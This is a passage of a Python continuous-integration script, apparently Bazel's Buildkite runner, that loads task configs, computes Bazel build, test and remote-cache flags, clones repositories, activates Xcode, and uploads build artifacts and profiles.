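# is folded into "tasks", so downstream code only ever sees
#   tasks:
#     ubuntu1804:
#       build_targets: ["//..."]
# with the task ID doubling as the platform name.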
def load_remote_yaml_file(http_url):
with urllib.request.urlopen(http_url) as resp:
reader = codecs.getreader("utf-8")
return yaml.safe_load(reader(resp))
def load_imported_tasks(import_name, http_url, file_config):
if "/" in import_name:
raise BuildkiteException("Invalid import '%s'" % import_name)
old_path = http_url or file_config
new_path = "%s%s" % (old_path[: old_path.rfind("/") + 1], import_name)
if http_url:
http_url = new_path
else:
file_config = new_path
imported_config = load_config(http_url=http_url, file_config=file_config, allow_imports=False)
namespace = import_name.partition(".")[0]
tasks = {}
for task_name, task_config in imported_config["tasks"].items():
fix_imported_task_platform(task_name, task_config)
fix_imported_task_name(namespace, task_config)
fix_imported_task_working_directory(namespace, task_config)
tasks["%s_%s" % (namespace, task_name)] = task_config
return tasks
def fix_imported_task_platform(task_name, task_config):
if "platform" not in task_config:
task_config["platform"] = task_name
def fix_imported_task_name(namespace, task_config):
old_name = task_config.get("name")
task_config["name"] = "%s (%s)" % (namespace, old_name) if old_name else namespace
def fix_imported_task_working_directory(namespace, task_config):
old_dir = task_config.get("working_directory")
task_config["working_directory"] = os.path.join(namespace, old_dir) if old_dir else namespace
def print_collapsed_group(name):
eprint("\n\n--- {0}\n\n".format(name))
def print_expanded_group(name):
eprint("\n\n+++ {0}\n\n".format(name))
def use_bazelisk_migrate():
"""
If USE_BAZELISK_MIGRATE is set, we use `bazelisk --migrate` to test incompatible flags.
"""
return bool(os.environ.get("USE_BAZELISK_MIGRATE"))
def bazelisk_flags():
return ["--migrate"] if use_bazelisk_migrate() else []
def calculate_flags(task_config, task_config_key, action_key, tmpdir, test_env_vars):
include_json_profile = task_config.get("include_json_profile", [])
capture_corrupted_outputs = task_config.get("capture_corrupted_outputs", [])
json_profile_flags = []
json_profile_out = None
if action_key in include_json_profile:
json_profile_out = os.path.join(tmpdir, "{}.profile.gz".format(action_key))
json_profile_flags = get_json_profile_flags(json_profile_out)
capture_corrupted_outputs_flags = []
capture_corrupted_outputs_dir = None
if action_key in capture_corrupted_outputs:
capture_corrupted_outputs_dir = os.path.join(
tmpdir, "{}_corrupted_outputs".format(action_key)
)
capture_corrupted_outputs_flags = [
"--experimental_remote_capture_corrupted_outputs={}".format(
capture_corrupted_outputs_dir
)
]
flags = task_config.get(task_config_key) or []
flags += json_profile_flags
flags += capture_corrupted_outputs_flags
# We have to add --test_env flags to `build`, too, otherwise Bazel
# discards its analysis cache between `build` and `test`.
if test_env_vars:
flags += ["--test_env={}".format(v) for v in test_env_vars]
return flags, json_profile_out, capture_corrupted_outputs_dir
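# Illustrative task config snippet (hypothetical flag values) showing the keys that
# calculate_flags() above consumes for the "build" action:
#
#   build_flags:
#     - "--config=ci"
#   include_json_profile:
#     - build    # writes <tmpdir>/build.profile.gz via the --profile flags
#   capture_corrupted_outputs:
#     - build    # adds --experimental_remote_capture_corrupted_outputs=<tmpdir>/build_corrupted_outputs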
def execute_commands(
task_config,
platform,
git_repository,
git_commit,
repo_location,
use_bazel_at_commit,
use_but,
save_but,
needs_clean,
build_only,
test_only,
monitor_flaky_tests,
incompatible_flags,
bazel_version=None,
):
# If we want to test incompatible flags, we ignore bazel_version and always use
# the latest Bazel version through Bazelisk.
if incompatible_flags:
bazel_version = None
if not bazel_version:
# The last good version of Bazel can be specified in an emergency file.
# However, we only use last_good_bazel for pipelines that do not
# explicitly specify a version of Bazel.
try:
emergency_settings = load_remote_yaml_file(EMERGENCY_FILE_URL)
bazel_version = emergency_settings.get("last_good_bazel")
except urllib.error.HTTPError:
# Ignore this error. The Setup step will have already complained about
# it by showing an error message.
pass
if build_only and test_only:
raise BuildkiteException("build_only and test_only cannot be true at the same time")
if use_bazel_at_commit and use_but:
raise BuildkiteException("use_bazel_at_commit cannot be set when use_but is true")
tmpdir = tempfile.mkdtemp()
sc_process = None
try:
if platform == "macos" or platform == "macos_arm64":
activate_xcode(task_config)
# If the CI worker runs Bazelisk, we need to forward all required env variables to the test.
# Otherwise any integration test that invokes Bazel (=Bazelisk in this case) will fail.
test_env_vars = ["LocalAppData"] if platform == "windows" else ["HOME"]
# CI should have its own user agent so that we can remove it from Bazel download statistics.
os.environ["BAZELISK_USER_AGENT"] = "Bazelisk/BazelCI"
test_env_vars.append("BAZELISK_USER_AGENT")
if repo_location:
os.chdir(repo_location)
elif git_repository:
clone_git_repository(git_repository, platform, git_commit)
# We use one binary for all Linux platforms (because we also just release one binary for all
# Linux versions and we have to ensure that it works on all of them).
binary_platform = platform if platform in ["macos", "windows"] else LINUX_BINARY_PLATFORM
if use_bazel_at_commit:
print_collapsed_group(":gcloud: Downloading Bazel built at " + use_bazel_at_commit)
bazel_binary = download_bazel_binary_at_commit(
tmpdir, binary_platform, use_bazel_at_commit
)
os.environ["USE_BAZEL_VERSION"] = bazel_binary
elif use_but:
print_collapsed_group(":gcloud: Downloading Bazel Under Test")
bazel_binary = download_bazel_binary(tmpdir, binary_platform)
os.environ["USE_BAZEL_VERSION"] = bazel_binary
else:
bazel_binary = "bazel"
if bazel_version:
os.environ["USE_BAZEL_VERSION"] = bazel_version
if "USE_BAZEL_VERSION" in os.environ and not task_config.get(
"skip_use_bazel_version_for_test", False
):
# This will only work if the bazel binary in $PATH is actually a bazelisk binary
# (https://github.com/bazelbuild/bazelisk).
test_env_vars.append("USE_BAZEL_VERSION")
for key, value in task_config.get("environment", {}).items():
# We have to explicitly convert the value to a string, because sometimes YAML tries to
# be smart and converts strings like "true" and "false" to booleans.
os.environ[key] = os.path.expandvars(str(value))
# Set BAZELISK_SHUTDOWN to 1 when we use bazelisk --migrate on Windows.
# This is a workaround for https://github.com/bazelbuild/continuous-integration/issues/1012
if use_bazelisk_migrate() and platform == "windows":
os.environ["BAZELISK_SHUTDOWN"] = "1"
cmd_exec_func = execute_batch_commands if platform == "windows" else execute_shell_commands
cmd_exec_func(task_config.get("setup", None))
# Allow the config to override the current working directory.
required_prefix = os.getcwd()
requested_working_dir = os.path.abspath(task_config.get("working_directory", ""))
if os.path.commonpath([required_prefix, requested_working_dir]) != required_prefix:
raise BuildkiteException("working_directory refers to a path outside the workspace")
os.chdir(requested_working_dir)
if platform == "windows":
execute_batch_commands(task_config.get("batch_commands", None))
else:
execute_shell_commands(task_config.get("shell_commands", None))
bazel_version = print_bazel_version_info(bazel_binary, platform)
print_environment_variables_info()
if incompatible_flags:
print_expanded_group("Build and test with the following incompatible flags:")
for flag in incompatible_flags:
eprint(flag + "\n")
execute_bazel_run(
bazel_binary, platform, task_config.get("run_targets", None), incompatible_flags
)
if task_config.get("sauce"):
sc_process = start_sauce_connect_proxy(platform, tmpdir)
if needs_clean:
execute_bazel_clean(bazel_binary, platform)
build_targets, test_targets, index_targets = calculate_targets(
task_config, platform, bazel_binary, build_only, test_only
)
if build_targets:
(
build_flags,
json_profile_out_build,
capture_corrupted_outputs_dir_build,
) = calculate_flags(task_config, "build_flags", "build", tmpdir, test_env_vars)
try:
release_name = get_release_name_from_branch_name()
execute_bazel_build(
bazel_version,
bazel_binary,
platform,
build_flags
+ (
["--stamp", "--embed_label=%s" % release_name]
if save_but and release_name
else []
),
build_targets,
None,
incompatible_flags,
)
if save_but:
upload_bazel_binary(platform)
finally:
if json_profile_out_build:
upload_json_profile(json_profile_out_build, tmpdir)
if capture_corrupted_outputs_dir_build:
upload_corrupted_outputs(capture_corrupted_outputs_dir_build, tmpdir)
if test_targets:
test_flags, json_profile_out_test, capture_corrupted_outputs_dir_test = calculate_flags(
task_config, "test_flags", "test", tmpdir, test_env_vars
)
if not is_windows():
# On platforms that support sandboxing (Linux, MacOS) we have
# to allow access to Bazelisk's cache directory.
# However, the flag requires the directory to exist,
# so we create it here in order to not crash when a test
# does not invoke Bazelisk.
bazelisk_cache_dir = get_bazelisk_cache_directory(platform)
os.makedirs(bazelisk_cache_dir, mode=0o755, exist_ok=True)
test_flags.append("--sandbox_writable_path={}".format(bazelisk_cache_dir))
test_bep_file = os.path.join(tmpdir, "test_bep.json")
stop_request = threading.Event()
upload_thread = threading.Thread(
target=upload_test_logs_from_bep, args=(test_bep_file, tmpdir, stop_request)
)
try:
upload_thread.start()
try:
execute_bazel_test(
bazel_version,
bazel_binary,
platform,
test_flags,
test_targets,
test_bep_file,
monitor_flaky_tests,
incompatible_flags,
)
if monitor_flaky_tests:
upload_bep_logs_for_flaky_tests(test_bep_file)
finally:
if json_profile_out_test:
upload_json_profile(json_profile_out_test, tmpdir)
if capture_corrupted_outputs_dir_test:
upload_corrupted_outputs(capture_corrupted_outputs_dir_test, tmpdir)
finally:
stop_request.set()
upload_thread.join()
if index_targets:
(
index_flags,
json_profile_out_index,
capture_corrupted_outputs_dir_index,
) = calculate_flags(task_config, "index_flags", "index", tmpdir, test_env_vars)
index_upload_policy = task_config.get("index_upload_policy", "IfBuildSuccess")
index_upload_gcs = task_config.get("index_upload_gcs", False)
try:
should_upload_kzip = index_upload_policy == INDEX_UPLOAD_POLICY_ALWAYS
try:
execute_bazel_build_with_kythe(
bazel_version,
bazel_binary,
platform,
index_flags,
index_targets,
None,
incompatible_flags,
)
if index_upload_policy == INDEX_UPLOAD_POLICY_IF_BUILD_SUCCESS:
should_upload_kzip = True
except subprocess.CalledProcessError as e:
# If not running with Always policy, raise the build error.
if index_upload_policy != INDEX_UPLOAD_POLICY_ALWAYS:
handle_bazel_failure(e, "build")
if should_upload_kzip and not is_pull_request():
try:
merge_and_upload_kythe_kzip(platform, index_upload_gcs)
except subprocess.CalledProcessError:
raise BuildkiteException("Failed to upload kythe kzip")
finally:
if json_profile_out_index:
upload_json_profile(json_profile_out_index, tmpdir)
if capture_corrupted_outputs_dir_index:
upload_corrupted_outputs(capture_corrupted_outputs_dir_index, tmpdir)
finally:
terminate_background_process(sc_process)
if tmpdir:
shutil.rmtree(tmpdir)
def activate_xcode(task_config):
# Get the Xcode version from the config.
wanted_xcode_version = task_config.get("xcode_version", DEFAULT_XCODE_VERSION)
print_collapsed_group(":xcode: Activating Xcode {}...".format(wanted_xcode_version))
# Ensure it's a valid version number.
if not isinstance(wanted_xcode_version, str):
raise BuildkiteException(
"Version number '{}' is not a string. Did you forget to put it in quotes?".format(
wanted_xcode_version
)
)
if not XCODE_VERSION_REGEX.match(wanted_xcode_version):
raise BuildkiteException(
"Invalid Xcode version format '{}', must match the format X.Y[.Z].".format(
wanted_xcode_version
)
)
# This is used to replace e.g. 11.2 with 11.2.1 without having to update all configs.
xcode_version = XCODE_VERSION_OVERRIDES.get(wanted_xcode_version, wanted_xcode_version)
# This falls back to a default version if the selected version is not available.
supported_versions = sorted(
# Stripping "Xcode" prefix and ".app" suffix from e.g. "Xcode12.0.1.app" leaves just the version number.
[os.path.basename(x)[5:-4] for x in glob("/Applications/Xcode*.app")],
reverse=True,
)
if xcode_version not in supported_versions:
xcode_version = DEFAULT_XCODE_VERSION
if xcode_version != wanted_xcode_version:
print_collapsed_group(
":xcode: Fixed Xcode version: {} -> {}...".format(wanted_xcode_version, xcode_version)
)
lines = [
"Your selected Xcode version {} was not available on the machine.".format(
wanted_xcode_version
),
"Bazel CI automatically picked a fallback version: {}.".format(xcode_version),
"Available versions are: {}.".format(supported_versions),
]
execute_command(
[
"buildkite-agent",
"annotate",
"--style=warning",
"\n".join(lines),
"--context",
"ctx-xcode_version_fixed",
]
)
# Check that the selected Xcode version is actually installed on the host.
xcode_path = "/Applications/Xcode{}.app".format(xcode_version)
if not os.path.exists(xcode_path):
raise BuildkiteException("Xcode not found at '{}'.".format(xcode_path))
# Now activate the specified Xcode version and let it install its required components.
# The CI machines have a sudoers config that allows the 'buildkite' user to run exactly
# these two commands, so don't change them without also modifying the file there.
execute_command(["/usr/bin/sudo", "/usr/bin/xcode-select", "--switch", xcode_path])
execute_command(["/usr/bin/sudo", "/usr/bin/xcodebuild", "-runFirstLaunch"])
def get_bazelisk_cache_directory(platform):
# The path relies on the behavior of Go's os.UserCacheDir()
# and of the Go version of Bazelisk.
cache_dir = "Library/Caches" if platform == "macos" else ".cache"
return os.path.join(os.environ.get("HOME"), cache_dir, "bazelisk")
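# For example, assuming HOME=/Users/buildkite on the macOS workers, the function
# above returns "/Users/buildkite/Library/Caches/bazelisk"; on all other platforms
# it returns "<HOME>/.cache/bazelisk".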
def tests_with_status(bep_file, status):
return set(label for label, _ in test_logs_for_status(bep_file, status=[status]))
def start_sauce_connect_proxy(platform, tmpdir):
print_collapsed_group(":saucelabs: Starting Sauce Connect Proxy")
os.environ["SAUCE_USERNAME"] = "bazel_rules_webtesting"
os.environ["SAUCE_ACCESS_KEY"] = saucelabs_token()
os.environ["TUNNEL_IDENTIFIER"] = str(uuid.uuid4())
os.environ["BUILD_TAG"] = str(uuid.uuid4())
readyfile = os.path.join(tmpdir, "sc_is_ready")
if platform == "windows":
cmd = ["sauce-connect.exe", "-i", os.environ["TUNNEL_IDENTIFIER"], "-f", readyfile]
else:
cmd = ["sc", "-i", os.environ["TUNNEL_IDENTIFIER"], "-f", readyfile]
sc_process = execute_command_background(cmd)
wait_start = time.time()
while not os.path.exists(readyfile):
if time.time() - wait_start > 60:
raise BuildkiteException(
"Sauce Connect Proxy is still not ready after 60 seconds, aborting!"
)
time.sleep(1)
print("Sauce Connect Proxy is ready, continuing...")
return sc_process
def saucelabs_token():
return decrypt_token(encrypted_token=ENCRYPTED_SAUCELABS_TOKEN, kms_key="saucelabs-access-key")
def current_branch_is_main_branch():
return os.getenv("BUILDKITE_BRANCH") in ("master", "stable", "main")
def get_release_name_from_branch_name():
res = re.match(r"release-(\d+\.\d+\.\d+(rc\d+)?).*", os.getenv("BUILDKITE_BRANCH"))
return res.group(1) if res else ""
def is_pull_request():
third_party_repo = os.getenv("BUILDKITE_PULL_REQUEST_REPO", "")
return len(third_party_repo) > 0
def has_flaky_tests(bep_file):
return len(test_logs_for_status(bep_file, status=["FLAKY"])) > 0
def print_bazel_version_info(bazel_binary, platform):
print_collapsed_group(":information_source: Bazel Info")
version_output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "version"]
)
execute_command(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "info"]
)
match = BUILD_LABEL_PATTERN.search(version_output)
return match.group(1) if match else "unreleased binary"
def print_environment_variables_info():
print_collapsed_group(":information_source: Environment Variables")
for key, value in os.environ.items():
eprint("%s=(%s)" % (key, value))
def upload_bazel_binary(platform):
print_collapsed_group(":gcloud: Uploading Bazel Under Test")
if platform == "windows":
binary_dir = r"bazel-bin\src"
binary_name = r"bazel.exe"
binary_nojdk_name = r"bazel_nojdk.exe"
else:
binary_dir = "bazel-bin/src"
binary_name = "bazel"
binary_nojdk_name = "bazel_nojdk"
execute_command(["buildkite-agent", "artifact", "upload", binary_name], cwd=binary_dir)
execute_command(["buildkite-agent", "artifact", "upload", binary_nojdk_name], cwd=binary_dir)
def merge_and_upload_kythe_kzip(platform, index_upload_gcs):
print_collapsed_group(":gcloud: Uploading kythe kzip")
kzips = glob("bazel-out/*/extra_actions/**/*.kzip", recursive=True)
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
git_commit = os.getenv("BUILDKITE_COMMIT")
final_kzip_name = "{}-{}-{}.kzip".format(build_number, platform, git_commit)
execute_command([f"{KYTHE_DIR}/tools/kzip", "merge", "--output", final_kzip_name] + kzips)
execute_command(["buildkite-agent", "artifact", "upload", final_kzip_name])
if index_upload_gcs:
pipeline = os.getenv("BUILDKITE_PIPELINE_SLUG")
destination = KZIPS_BUCKET + pipeline + "/" + final_kzip_name
print("Uploading to GCS {}".format(destination))
execute_command([gsutil_command(), "cp", final_kzip_name, destination])
def download_binary(dest_dir, platform, binary_name):
source_step = create_label(platform, "Bazel", build_only=True)
execute_command(
["buildkite-agent", "artifact", "download", binary_name, dest_dir, "--step", source_step]
)
bazel_binary_path = os.path.join(dest_dir, binary_name)
st = os.stat(bazel_binary_path)
os.chmod(bazel_binary_path, st.st_mode | stat.S_IEXEC)
return bazel_binary_path
def download_bazel_binary(dest_dir, platform):
binary_name = "bazel.exe" if platform == "windows" else "bazel"
return download_binary(dest_dir, platform, binary_name)
def download_bazel_nojdk_binary(dest_dir, platform):
binary_name = "bazel_nojdk.exe" if platform == "windows" else "bazel_nojdk"
return download_binary(dest_dir, platform, binary_name)
def download_binary_at_commit(
dest_dir, platform, bazel_git_commit, bazel_binary_url, bazel_binary_path
):
try:
execute_command([gsutil_command(), "cp", bazel_binary_url, bazel_binary_path])
except subprocess.CalledProcessError as e:
raise BuildkiteException(
"Failed to download Bazel binary at %s, error message:\n%s" % (bazel_git_commit, str(e))
)
st = os.stat(bazel_binary_path)
os.chmod(bazel_binary_path, st.st_mode | stat.S_IEXEC)
return bazel_binary_path
def download_bazel_binary_at_commit(dest_dir, platform, bazel_git_commit):
url = bazelci_builds_gs_url(platform, bazel_git_commit)
path = os.path.join(dest_dir, "bazel.exe" if platform == "windows" else "bazel")
return download_binary_at_commit(dest_dir, platform, bazel_git_commit, url, path)
def download_bazel_nojdk_binary_at_commit(dest_dir, platform, bazel_git_commit):
url = bazelci_builds_nojdk_gs_url(platform, bazel_git_commit)
path = os.path.join(dest_dir, "bazel_nojdk.exe" if platform == "windows" else "bazel_nojdk")
return download_binary_at_commit(dest_dir, platform, bazel_git_commit, url, path)
def get_mirror_path(git_repository, platform):
mirror_root = {
"macos": "/usr/local/var/bazelbuild/",
"windows": "c:\\buildkite\\bazelbuild\\",
}.get(platform, "/var/lib/bazelbuild/")
return mirror_root + re.sub(r"[^0-9A-Za-z]", "-", git_repository)
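# Example: for the repository "https://github.com/bazelbuild/bazel.git" on a Linux
# worker, get_mirror_path() returns
# "/var/lib/bazelbuild/https---github-com-bazelbuild-bazel-git", since every
# character that is not a letter or digit is replaced by "-".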
def clone_git_repository(git_repository, platform, git_commit=None):
root = downstream_projects_root(platform)
project_name = re.search(r"/([^/]+)\.git$", git_repository).group(1)
clone_path = os.path.join(root, project_name)
print_collapsed_group(
"Fetching %s sources at %s" % (project_name, git_commit if git_commit else "HEAD")
)
mirror_path = get_mirror_path(git_repository, platform)
if not os.path.exists(clone_path):
if os.path.exists(mirror_path):
execute_command(
["git", "clone", "-v", "--reference", mirror_path, git_repository, clone_path]
)
else:
execute_command(["git", "clone", "-v", git_repository, clone_path])
os.chdir(clone_path)
execute_command(["git", "remote", "set-url", "origin", git_repository])
execute_command(["git", "clean", "-fdqx"])
execute_command(["git", "submodule", "foreach", "--recursive", "git clean -fdqx"])
execute_command(["git", "fetch", "origin"])
if git_commit:
# sync to a specific commit of this repository
execute_command(["git", "reset", git_commit, "--hard"])
else:
# sync to the latest commit of origin's HEAD. Unlike `git pull`, this also works after a force push.
remote_head = (
subprocess.check_output(["git", "symbolic-ref", "refs/remotes/origin/HEAD"])
.decode("utf-8")
.rstrip()
)
execute_command(["git", "reset", remote_head, "--hard"])
execute_command(["git", "submodule", "sync", "--recursive"])
execute_command(["git", "submodule", "update", "--init", "--recursive", "--force"])
execute_command(["git", "submodule", "foreach", "--recursive", "git reset --hard"])
execute_command(["git", "clean", "-fdqx"])
execute_command(["git", "submodule", "foreach", "--recursive", "git clean -fdqx"])
return clone_path
def execute_batch_commands(commands):
if not commands:
return
print_collapsed_group(":batch: Setup (Batch Commands)")
batch_commands = "&".join(commands)
return subprocess.run(batch_commands, shell=True, check=True, env=os.environ).returncode
def execute_shell_commands(commands):
if not commands:
return
print_collapsed_group(":bash: Setup (Shell Commands)")
shell_command = "\n".join(["set -e"] + commands)
execute_command([shell_command], shell=True)
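# Sketch of what execute_shell_commands() above runs for a hypothetical config with
# commands = ["apt-get update", "apt-get -y install foo"]; the single shell
# invocation becomes:
#
#   set -e
#   apt-get update
#   apt-get -y install foo
#
# so the first failing command aborts the entire setup step.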
def handle_bazel_failure(exception, action):
msg = "bazel {0} failed with exit code {1}".format(action, exception.returncode)
if use_bazelisk_migrate():
print_collapsed_group(msg)
else:
raise BuildkiteException(msg)
def execute_bazel_run(bazel_binary, platform, targets, incompatible_flags):
if not targets:
return
print_collapsed_group("Setup (Run Targets)")
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
incompatible_flags_to_use = (
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags
)
for target in targets:
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["run"]
+ common_build_flags(None, platform)
+ incompatible_flags_to_use
+ [target]
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "run")
def remote_caching_flags(platform):
# Only enable caching for untrusted and testing builds.
if CLOUD_PROJECT not in ["bazel-untrusted"]:
return []
platform_cache_key = [BUILDKITE_ORG.encode("utf-8")]
# Whenever the remote cache was known to have been poisoned, increase the number below.
platform_cache_key += ["cache-poisoning-20210811".encode("utf-8")]
if platform == "macos":
platform_cache_key += [
# macOS version:
subprocess.check_output(["/usr/bin/sw_vers", "-productVersion"]),
# Path to Xcode:
subprocess.check_output(["/usr/bin/xcode-select", "-p"]),
# Xcode version:
subprocess.check_output(["/usr/bin/xcodebuild", "-version"]),
]
# Use a local cache server for our macOS machines.
flags = ["--remote_cache=http://100.107.73.148"]
else:
platform_cache_key += [
# Platform name:
platform.encode("utf-8")
]
# Use RBE for caching builds running on GCE.
flags = [
"--google_default_credentials",
"--remote_cache=remotebuildexecution.googleapis.com",
"--remote_instance_name=projects/{}/instances/default_instance".format(CLOUD_PROJECT),
]
platform_cache_digest = hashlib.sha256()
for key in platform_cache_key:
eprint("Adding to platform cache key: {}".format(key))
platform_cache_digest.update(key)
platform_cache_digest.update(b":")
flags += [
"--remote_timeout=60",
"--remote_max_connections=200",
'--remote_default_platform_properties=properties:{name:"cache-silo-key" value:"%s"}'
% platform_cache_digest.hexdigest(),
]
return flags
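# The cache-silo-key above is the hex SHA-256 digest of all platform_cache_key
# entries, each followed by ":" - conceptually
# sha256(b"<org>:cache-poisoning-20210811:<platform details>:").hexdigest().
# Bumping the "cache-poisoning-..." entry therefore moves every build to a fresh
# cache silo.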
def remote_enabled(flags):
# Detect if the project configuration enabled its own remote caching / execution.
remote_flags = ["--remote_executor", "--remote_cache", "--remote_http_cache"]
for flag in flags:
for remote_flag in remote_flags:
if flag.startswith(remote_flag):
return True
return False
def concurrent_jobs(platform):
return "75" if platform.startswith("rbe_") else str(multiprocessing.cpu_count())
def concurrent_test_jobs(platform):
if platform.startswith("rbe_"):
return "75"
elif platform == "windows":
return "8"
elif platform.startswith("macos") and THIS_IS_TESTING:
return "4"
elif platform.startswith("macos"):
return "8"
return "12"
def common_startup_flags(platform):
if platform == "windows":
if os.path.exists("D:/b"):
# This machine has a local SSD mounted as drive D.
return ["--output_user_root=D:/b"]
else:
# This machine uses its PD-SSD as the build directory.
return ["--output_user_root=C:/b"]
return []
def common_build_flags(bep_file, platform):
flags = [
"--show_progress_rate_limit=5",
"--curses=yes",
"--color=yes",
"--terminal_columns=143",
"--show_timestamps",
"--verbose_failures",
"--jobs=" + concurrent_jobs(platform),
"--announce_rc",
"--experimental_repository_cache_hardlinks",
# Some projects set --disk_cache in their project-specific bazelrc, which we never want on
# CI, so let's just disable it explicitly.
"--disk_cache=",
]
if platform == "windows":
pass
elif platform == "macos":
flags += [
"--sandbox_writable_path=/var/tmp/_bazel_buildkite/cache/repos/v1",
"--test_env=REPOSITORY_CACHE=/var/tmp/_bazel_buildkite/cache/repos/v1",
]
else:
flags += ["--sandbox_tmpfs_path=/tmp"]
if bep_file:
flags += [
"--experimental_build_event_json_file_path_conversion=false",
"--build_event_json_file=" + bep_file,
]
return flags
def rbe_flags(original_flags, accept_cached):
# Enable remote execution via RBE.
flags = [
"--remote_executor=remotebuildexecution.googleapis.com",
"--remote_instance_name=projects/bazel-untrusted/instances/default_instance",
"--remote_timeout=3600",
"--incompatible_strict_action_env",
"--google_default_credentials",
"--toolchain_resolution_debug",
]
# Enable BES / Build Results reporting.
flags += [
"--bes_backend=buildeventservice.googleapis.com",
"--bes_timeout=360s",
"--project_id=bazel-untrusted",
]
if not accept_cached:
flags += ["--noremote_accept_cached"]
# Adapted from https://github.com/bazelbuild/bazel-toolchains/blob/master/bazelrc/.bazelrc
flags += [
# These should no longer need to be modified.
# All that is needed is updating the @bazel_toolchains repo pin
# in projects' WORKSPACE files.
#
# Toolchain related flags to append at the end of your .bazelrc file.
"--host_javabase=@buildkite_config//java:jdk",
"--javabase=@buildkite_config//java:jdk",
"--host_java_toolchain=@bazel_tools//tools/jdk:toolchain_hostjdk8",
"--java_toolchain=@bazel_tools//tools/jdk:toolchain_hostjdk8",
"--crosstool_top=@buildkite_config//cc:toolchain",
"--action_env=BAZEL_DO_NOT_DETECT_CPP_TOOLCHAIN=1",
]
# Platform flags:
# The toolchain container used for execution is defined in the target indicated
# by "extra_execution_platforms", "host_platform" and "platforms".
# If you are using your own toolchain container, you need to create a platform
# target with "constraint_values" that allow for the toolchain specified with
# "extra_toolchains" to be selected (given constraints defined in
# "exec_compatible_with").
# More about platforms: https://docs.bazel.build/versions/master/platforms.html
# Don't add platform flags if they are specified already.
platform_flags = {
"--extra_toolchains": "@buildkite_config//config:cc-toolchain",
"--extra_execution_platforms": "@buildkite_config//config:platform",
"--host_platform": "@buildkite_config//config:platform",
"--platforms": "@buildkite_config//config:platform",
}
for platform_flag, value in list(platform_flags.items()):
found = False
for original_flag in original_flags:
if original_flag.startswith(platform_flag):
found = True
break
if not found:
flags += [platform_flag + "=" + value]
return flags
def compute_flags(
platform, flags, incompatible_flags, bep_file, bazel_binary, enable_remote_cache=False
):
aggregated_flags = common_build_flags(bep_file, platform)
if not remote_enabled(flags):
if platform.startswith("rbe_"):
aggregated_flags += rbe_flags(flags, accept_cached=enable_remote_cache)
elif enable_remote_cache:
aggregated_flags += remote_caching_flags(platform)
aggregated_flags += flags
if incompatible_flags:
aggregated_flags += incompatible_flags
for i, flag in enumerate(aggregated_flags):
if "$HOME" in flag:
if platform == "windows":
if os.path.exists("D:/"):
home = "D:"
else:
home = "C:/b"
elif platform == "macos":
home = "/Users/buildkite"
else:
home = "/var/lib/buildkite-agent"
aggregated_flags[i] = flag.replace("$HOME", home)
if "$OUTPUT_BASE" in flag:
output_base = execute_command_and_get_output(
[bazel_binary] + common_startup_flags(platform) + ["info", "output_base"],
print_output=False,
).strip()
aggregated_flags[i] = flag.replace("$OUTPUT_BASE", output_base)
return aggregated_flags
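# Example of the placeholder expansion at the end of compute_flags(): a hypothetical
# flag such as "--test_env=XDG_CACHE_HOME=$HOME/.cache" becomes
# "--test_env=XDG_CACHE_HOME=/var/lib/buildkite-agent/.cache" on Linux workers, and
# "$OUTPUT_BASE" is replaced with the result of `bazel info output_base`.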
def execute_bazel_clean(bazel_binary, platform):
print_expanded_group(":bazel: Clean")
try:
execute_command([bazel_binary] + common_startup_flags(platform) + ["clean", "--expunge"])
except subprocess.CalledProcessError as e:
raise BuildkiteException("bazel clean failed with exit code {}".format(e.returncode))
def kythe_startup_flags():
return [f"--bazelrc={KYTHE_DIR}/extractors.bazelrc"]
def kythe_build_flags():
return [
"--experimental_convenience_symlinks=normal",
f"--override_repository=kythe_release={KYTHE_DIR}",
]
def execute_bazel_build(
bazel_version, bazel_binary, platform, flags, targets, bep_file, incompatible_flags
):
print_collapsed_group(":bazel: Computing flags for build step")
aggregated_flags = compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=True,
)
print_expanded_group(":bazel: Build ({})".format(bazel_version))
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["build"]
+ aggregated_flags
+ ["--"]
+ targets
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "build")
def execute_bazel_build_with_kythe(
bazel_version, bazel_binary, platform, flags, targets, bep_file, incompatible_flags
):
print_collapsed_group(":bazel: Computing flags for build step")
aggregated_flags = compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=False,
)
print_expanded_group(":bazel: Build ({})".format(bazel_version))
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ kythe_startup_flags()
+ ["build"]
+ kythe_build_flags()
+ aggregated_flags
+ ["--"]
+ targets
)
def calculate_targets(task_config, platform, bazel_binary, build_only, test_only):
build_targets = [] if test_only else task_config.get("build_targets", [])
test_targets = [] if build_only else task_config.get("test_targets", [])
index_targets = [] if (build_only or test_only) else task_config.get("index_targets", [])
index_targets_query = (
None if (build_only or test_only) else task_config.get("index_targets_query", None)
)
if index_targets_query:
output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "query", index_targets_query],
print_output=False,
)
index_targets += output.strip().split("\n")
# Remove the "--" argument splitter from the list that some configs explicitly
# include. We'll add it back again later where needed.
build_targets = [x.strip() for x in build_targets if x.strip() != "--"]
test_targets = [x.strip() for x in test_targets if x.strip() != "--"]
index_targets = [x.strip() for x in index_targets if x.strip() != "--"]
shard_id = int(os.getenv("BUILDKITE_PARALLEL_JOB", "-1"))
shard_count = int(os.getenv("BUILDKITE_PARALLEL_JOB_COUNT", "-1"))
if shard_id > -1 and shard_count > -1:
print_collapsed_group(
